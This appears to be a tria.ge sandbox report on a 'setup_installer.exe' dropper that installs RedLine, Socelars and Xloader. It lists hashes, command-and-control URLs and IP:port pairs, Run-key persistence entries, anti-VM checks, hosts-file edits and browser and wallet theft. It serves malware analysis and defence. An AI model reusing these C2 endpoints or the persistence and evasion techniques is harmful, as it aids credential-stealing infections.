Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
28/10/2021, 15:53
211028-tbqhfabhb2 1028/10/2021, 05:27
211028-f5paksheak 1027/10/2021, 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
1295s -
max time network
1776s -
submitted
01/01/1970, 00:00
Static task
static1
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
chris
194.104.136.5:46013
Extracted
redline
media26
91.121.67.60:23325
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6308 4884 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3592 4884 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5384 4884 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1044 4884 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1696 4884 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10328 4884 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8684 4884 rundll32.exe 14 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral1/memory/3192-317-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/3192-314-0x0000000000000000-mapping.dmp family_redline behavioral1/memory/5312-335-0x0000000000000000-mapping.dmp family_redline behavioral1/memory/5312-337-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Socelars Payload 2 IoCs
resource yara_rule behavioral1/files/0x000100000002b1c4-189.dat family_socelars behavioral1/files/0x000100000002b1c4-225.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 55 IoCs
description pid Process procid_target PID 7096 created 6396 7096 WerFault.exe 177 PID 6172 created 4092 6172 WerFault.exe 110 PID 6132 created 2212 6132 WerFault.exe 267 PID 5296 created 3320 5296 WerFault.exe 114 PID 2020 created 4468 2020 WerFault.exe 532 PID 3696 created 6364 3696 WerFault.exe 183 PID 6484 created 2176 6484 WerFault.exe 160 PID 2632 created 7024 2632 WerFault.exe 276 PID 2112 created 5584 2112 WerFault.exe 292 PID 4408 created 1120 4408 WerFault.exe 150 PID 6412 created 2624 6412 WerFault.exe 154 PID 6220 created 2852 6220 WerFault.exe 149 PID 2272 created 5964 2272 WerFault.exe 169 PID 3308 created 3652 3308 WerFault.exe 226 PID 4540 created 5048 4540 WerFault.exe 172 PID 6172 created 5196 6172 WerFault.exe 163 PID 2056 created 1528 2056 WerFault.exe 654 PID 5584 created 6780 5584 WerFault.exe 317 PID 7428 created 5912 7428 WerFault.exe 174 PID 7468 created 1988 7468 WerFault.exe 153 PID 6896 created 2496 6896 WerFault.exe 388 PID 6148 created 7556 6148 WerFault.exe 296 PID 6324 created 7548 6324 msiexec.exe 298 PID 4708 created 7752 4708 WerFault.exe 320 PID 4540 created 7920 4540 WerFault.exe 373 PID 5104 created 7396 5104 Calculator.exe 303 PID 2340 created 7684 2340 WerFault.exe 381 PID 6740 created 6516 6740 WerFault.exe 318 PID 11816 created 5900 11816 WerFault.exe 394 PID 4636 created 5304 4636 WerFault.exe 659 PID 6728 created 10004 6728 WerFault.exe 422 PID 8080 created 9944 8080 WerFault.exe 416 PID 3048 created 6000 3048 WerFault.exe 470 PID 3412 created 8732 3412 WerFault.exe 398 PID 10588 created 6048 10588 WerFault.exe 588 PID 12092 created 9480 12092 WerFault.exe 497 PID 6584 created 7248 6584 WerFault.exe 464 PID 1416 created 9480 1416 WerFault.exe 497 PID 9616 created 11560 9616 WerFault.exe 510 PID 6936 created 9480 6936 WerFault.exe 497 PID 8644 created 9344 8644 WerFault.exe 556 PID 2552 created 7692 2552 WerFault.exe 515 PID 8884 created 6576 8884 WerFault.exe 562 PID 2160 created 9480 2160 WerFault.exe 497 PID 10040 created 9156 10040 msedge.exe 540 PID 5580 created 9480 5580 WerFault.exe 497 PID 3572 created 9480 3572 WerFault.exe 497 PID 12112 created 6472 12112 WerFault.exe 545 PID 12276 created 9480 12276 WerFault.exe 497 PID 4752 created 9480 4752 WerFault.exe 497 PID 6876 created 9480 6876 WerFault.exe 497 PID 6512 created 9480 6512 WerFault.exe 497 PID 6208 created 9480 6208 WerFault.exe 497 PID 1220 created 9480 1220 WerFault.exe 497 PID 12160 created 6372 12160 WerFault.exe 182 -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 2 IoCs
resource yara_rule behavioral1/memory/6560-564-0x0000000002A00000-0x0000000002A29000-memory.dmp xloader behavioral1/memory/936-590-0x0000000002CB0000-0x0000000002CD9000-memory.dmp xloader -
resource yara_rule behavioral1/files/0x000200000002b1ae-153.dat aspack_v212_v242 behavioral1/files/0x000200000002b1ac-152.dat aspack_v212_v242 behavioral1/files/0x000200000002b1ae-151.dat aspack_v212_v242 behavioral1/files/0x000200000002b1ac-157.dat aspack_v212_v242 behavioral1/files/0x000200000002b1ac-156.dat aspack_v212_v242 behavioral1/files/0x000100000002b1b5-155.dat aspack_v212_v242 behavioral1/files/0x000100000002b1b5-158.dat aspack_v212_v242 -
Blocklisted process makes network request 9 IoCs
flow pid Process 701 9576 MsiExec.exe 722 9576 MsiExec.exe 806 9576 MsiExec.exe 814 8692 powershell.exe 1187 7800 powershell.exe 1188 7800 powershell.exe 1334 6560 cscript.exe 1442 6560 cscript.exe 1506 6560 cscript.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
pid Process 1472 setup_install.exe 2800 Wed09b3a5ca1a712d390.exe 1720 Wed09f257bb7877d00b2.exe 4060 Wed09d8d6edfaff2ac.exe 4044 Wed0971f17486f8.exe 3320 Wed09db0d52c38.exe 1380 Wed096a1bff61.exe 2280 Wed0901eb1dae126e32.exe 4092 Wed09cfb2f9758281d8.exe 2212 Wed09c42cad92c20f79.exe 2632 Wed09d27135e5a8b3b.exe 2468 Wed09e95ff6b5.exe 4636 Wed09abf83d9c2.exe 2160 Wed094c47c32b.exe 3948 Wed09977fdc12334.exe 2928 Wed09d27135e5a8b3b.tmp 4468 Wed09b2a8bc4f16cb.exe 2840 Wed09d27135e5a8b3b.exe 2908 Wed09abf83d9c2.exe 4880 Wed09d27135e5a8b3b.tmp 2948 Wed0971f17486f8.exe 3192 Wed0901eb1dae126e32.exe 5372 ntvQls6W0Z9SGx99cektYOrz.exe 5500 ntvQls6W0Z9SGx99cektYOrz.exe 5524 4316430.exe 5584 WerFault.exe 5312 Wed0971f17486f8.exe 5640 5699730.exe 5688 LzmwAqmV.exe 5664 run2.exe 5796 6454724.exe 5812 postback.exe 5924 788088.exe 5976 XYB0bVL96aEKhA.exE 4516 BCleanSoft82.exe 5748 m9KuYRLsEx_AWLqP1mBvqrgu.exe 5804 LpBGQQvHgLkawiCz7GISvG0P.exe 2852 r5y3dnbVhvaXvp9RGdw3ItuO.exe 1120 VGa7nZ8cXrxZh9BQV_ujGsOW.exe 4540 WerFault.exe 5952 YgIqEx4XFbtnbNHkQWDzV0CA.exe 2176 5jWUy2pAopKponnGFDTz_bfA.exe 2140 gcqDb5zSn7BE_dUbS8yv3WOT.exe 5184 uosNhDevxECoZCg2RjBNDOu3.exe 5968 58_Gh9EN9Lb8VWqneFpJYvOy.exe 6004 d3iIex0FBgOMUXdGrqAqeumo.exe 4984 gcqDb5zSn7BE_dUbS8yv3WOT.exe 2624 YVY34vY7MvHUNmB1dwA2RZLa.exe 1988 jbxxMselF7ZbInsUkMPdKh9r.exe 5972 foldershare.exe 5196 wbRhqAkI0KanJbU9cRxvnLg2.exe 4304 wppjUuKifwe5OKIA6JpZTWg9.exe 6048 MQe2V0B0vbPkFUADTZlxPeHQ.exe 2876 eOX7_Qwa7pGMEb9wbMNxU4JT.exe 5672 Conhost.exe 5964 YVY34vY7MvHUNmB1dwA2RZLa.exe 5048 2o0JrOSDBo9q9SSTMzVCyTia.exe 5912 Soft1WW02.exe 6168 Gufiwylaehu.exe 6372 jg1_1faf.exe 6364 4.exe 6444 NWXhkOhPxmA8QsCp0Poyf13J.exe 6504 cutm3.exe 6836 8Px0xZGNRC1ER0CeVlJC0xnq.exe -
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion foldershare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion foldershare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eOX7_Qwa7pGMEb9wbMNxU4JT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eOX7_Qwa7pGMEb9wbMNxU4JT.exe -
Loads dropped DLL 64 IoCs
pid Process 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 2928 Wed09d27135e5a8b3b.tmp 4880 Wed09d27135e5a8b3b.tmp 6396 rundll32.exe 6236 8Px0xZGNRC1ER0CeVlJC0xnq.tmp 6352 WBiir5hGlETmLNsUlwQONX_F.exe 6352 WBiir5hGlETmLNsUlwQONX_F.exe 6284 Calculator Installation.exe 6284 Calculator Installation.exe 6284 Calculator Installation.exe 6284 Calculator Installation.exe 6352 WBiir5hGlETmLNsUlwQONX_F.exe 6352 WBiir5hGlETmLNsUlwQONX_F.exe 6284 Calculator Installation.exe 6352 WBiir5hGlETmLNsUlwQONX_F.exe 6352 WBiir5hGlETmLNsUlwQONX_F.exe 5436 msiexec.exe 6780 svchost.exe 8148 lmWL8_fCaR7KpxPFWCpSZATT.exe 8148 lmWL8_fCaR7KpxPFWCpSZATT.exe 3412 WerFault.exe 6288 Calculator.exe 6288 Calculator.exe 7404 1zQM3dQPlUbXwp5zsXr0sQ5t.exe 7404 1zQM3dQPlUbXwp5zsXr0sQ5t.exe 8148 lmWL8_fCaR7KpxPFWCpSZATT.exe 5708 DllHost.exe 7404 1zQM3dQPlUbXwp5zsXr0sQ5t.exe 7404 1zQM3dQPlUbXwp5zsXr0sQ5t.exe 7404 1zQM3dQPlUbXwp5zsXr0sQ5t.exe 7404 1zQM3dQPlUbXwp5zsXr0sQ5t.exe 8148 lmWL8_fCaR7KpxPFWCpSZATT.exe 7404 1zQM3dQPlUbXwp5zsXr0sQ5t.exe 8148 lmWL8_fCaR7KpxPFWCpSZATT.exe 7404 1zQM3dQPlUbXwp5zsXr0sQ5t.exe 8148 lmWL8_fCaR7KpxPFWCpSZATT.exe 8148 lmWL8_fCaR7KpxPFWCpSZATT.exe 8148 lmWL8_fCaR7KpxPFWCpSZATT.exe 4604 setup.exe 4604 setup.exe 7324 setup.exe 7324 setup.exe 7920 rundll32.exe 7684 rundll32.exe 7288 msiexec.exe 7288 msiexec.exe 6324 msiexec.exe 6324 msiexec.exe 9328 setting.exe 10272 installer.exe 10272 installer.exe 11200 FastPC.tmp 11200 FastPC.tmp 10272 installer.exe 5304 Settings.exe 4704 MsiExec.exe 4704 MsiExec.exe 5244 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 18 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Settings%20Installation.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run cscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\BJOXUJQ8PFR = "C:\\Program Files (x86)\\U1bjp\\bt1htnhplf.exe" cscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" d3iIex0FBgOMUXdGrqAqeumo.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce d3iIex0FBgOMUXdGrqAqeumo.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\Bivaegeneki.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Settings = "C:\\Users\\Admin\\AppData\\Roaming\\Settings\\Settings.exe --iUSIg" Settings%20Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 788088.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Calculator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" Calculator.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Pajaxotecy.exe\"" DYbALA.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldershare.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA eOX7_Qwa7pGMEb9wbMNxU4JT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: setting.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\U: setting.exe File opened (read-only) \??\Z: setting.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\O: setting.exe File opened (read-only) \??\I: setting.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\M: setting.exe File opened (read-only) \??\X: setting.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\F: setting.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\R: setting.exe File opened (read-only) \??\P: setting.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\G: setting.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\V: setting.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\E: setting.exe File opened (read-only) \??\L: setting.exe File opened (read-only) \??\S: setting.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\B: setting.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 170 ipinfo.io 213 ipinfo.io 223 ipinfo.io 327 ipinfo.io 327 ip-api.com 339 ipinfo.io 460 ipinfo.io 231 ipinfo.io 371 ipinfo.io 3 ipinfo.io 52 ipinfo.io 587 ipinfo.io 3 ip-api.com 51 ipinfo.io 171 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5972 foldershare.exe 2876 eOX7_Qwa7pGMEb9wbMNxU4JT.exe -
Suspicious use of SetThreadContext 13 IoCs
description pid Process procid_target PID 2280 set thread context of 3192 2280 Wed0901eb1dae126e32.exe 130 PID 4044 set thread context of 5312 4044 Wed0971f17486f8.exe 132 PID 5748 set thread context of 3212 5748 m9KuYRLsEx_AWLqP1mBvqrgu.exe 25 PID 4304 set thread context of 3212 4304 wppjUuKifwe5OKIA6JpZTWg9.exe 25 PID 4304 set thread context of 3212 4304 wppjUuKifwe5OKIA6JpZTWg9.exe 25 PID 2176 set thread context of 6052 2176 5jWUy2pAopKponnGFDTz_bfA.exe 196 PID 5584 set thread context of 6932 5584 WerFault.exe 237 PID 5184 set thread context of 4976 5184 uosNhDevxECoZCg2RjBNDOu3.exe 258 PID 1528 set thread context of 2468 1528 8246734.exe 270 PID 6560 set thread context of 3212 6560 cscript.exe 25 PID 2980 set thread context of 7084 2980 655.exe 392 PID 9520 set thread context of 5832 9520 conhost.exe 448 PID 6560 set thread context of 5832 6560 cscript.exe 448 -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000100000002b1c5-197.dat autoit_exe behavioral1/files/0x000100000002b1c5-236.dat autoit_exe -
Drops file in Program Files directory 25 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe 7D0E.exe File created C:\Program Files\Windows Sidebar\ZJHVIBCUGH\foldershare.exe DYbALA.exe File created C:\Program Files (x86)\Windows Defender\Pajaxotecy.exe DYbALA.exe File opened for modification C:\Program Files (x86)\FastPc\FastPc\Fast_.exe Setup.exe File opened for modification C:\Program Files (x86)\U1bjp\bt1htnhplf.exe cscript.exe File opened for modification C:\Program Files (x86)\U1bjp Explorer.EXE File created C:\Program Files\Windows Sidebar\ZJHVIBCUGH\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\Common Files\Bivaegeneki.exe DYbALA.exe File created C:\Program Files (x86)\Common Files\Bivaegeneki.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe gcqDb5zSn7BE_dUbS8yv3WOT.exe File created C:\Program Files (x86)\Windows Defender\Pajaxotecy.exe.config DYbALA.exe File created C:\Program Files\Windows Photo Viewer\VGZXDYHCPN\foldershare.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\FastPc\FastPc\Faster.exe Setup.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-CTSEJ.tmp Wed09d27135e5a8b3b.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe gcqDb5zSn7BE_dUbS8yv3WOT.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 7D0E.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe gcqDb5zSn7BE_dUbS8yv3WOT.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe gcqDb5zSn7BE_dUbS8yv3WOT.exe File created C:\Program Files\Windows Photo Viewer\VGZXDYHCPN\foldershare.exe DYbALA.exe File created C:\Program Files (x86)\U1bjp\bt1htnhplf.exe Explorer.EXE File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe 7D0E.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 7D0E.exe -
Drops file in Windows directory 30 IoCs
description ioc Process File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File created C:\Windows\Installer\f77d5a6.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI5B46.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI60B6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI66B2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6ABB.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFFB475D0AE3122CB6.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI74ED.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WinHoster.exe File opened for modification C:\Windows\Installer\MSI4C41.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI502A.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFB96B3835B4BE8FF9.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIED84.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Installer\MSI780B.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF8635C7291599105E.TMP msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI472F.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\Installer\MSI490E.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\Installer\f77d5a6.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3BE3.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFE437B8E702EBCE8D.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 48 IoCs
pid pid_target Process procid_target 2844 4092 WerFault.exe 110 6108 6396 WerFault.exe 177 3300 2212 WerFault.exe 108 6824 3320 WerFault.exe 114 4316 7024 WerFault.exe 189 2056 5584 WerFault.exe 137 5920 1120 WerFault.exe 150 7024 2852 WerFault.exe 149 3424 2624 WerFault.exe 154 1600 5964 WerFault.exe 169 7360 1528 WerFault.exe 236 8048 1988 WerFault.exe 153 8092 5912 WerFault.exe 174 7088 2496 WerFault.exe 207 8048 7556 WerFault.exe 296 2984 7548 WerFault.exe 298 5388 7752 WerFault.exe 320 7604 7920 WerFault.exe 373 5908 7396 WerFault.exe 303 6036 7684 WerFault.exe 381 5688 6516 WerFault.exe 318 11772 5900 WerFault.exe 394 4260 5304 WerFault.exe 458 4200 10004 WerFault.exe 422 2016 9944 WerFault.exe 416 7984 6000 WerFault.exe 470 8244 8732 WerFault.exe 398 10692 6048 WerFault.exe 463 12172 9480 WerFault.exe 497 3704 7248 WerFault.exe 464 2508 9480 WerFault.exe 497 9864 11560 WerFault.exe 510 8820 9480 WerFault.exe 497 8920 7692 WerFault.exe 515 6632 9344 WerFault.exe 556 9304 6576 WerFault.exe 562 3500 9480 WerFault.exe 497 11012 9156 WerFault.exe 540 6048 9480 WerFault.exe 497 3312 9480 WerFault.exe 497 8224 6472 WerFault.exe 545 9584 9480 WerFault.exe 497 5864 9480 WerFault.exe 497 7448 9480 WerFault.exe 497 10092 9480 WerFault.exe 497 11512 9480 WerFault.exe 497 7892 9480 WerFault.exe 497 1528 6372 WerFault.exe 182 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uosNhDevxECoZCg2RjBNDOu3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uosNhDevxECoZCg2RjBNDOu3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uosNhDevxECoZCg2RjBNDOu3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 655.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 655.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 655.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
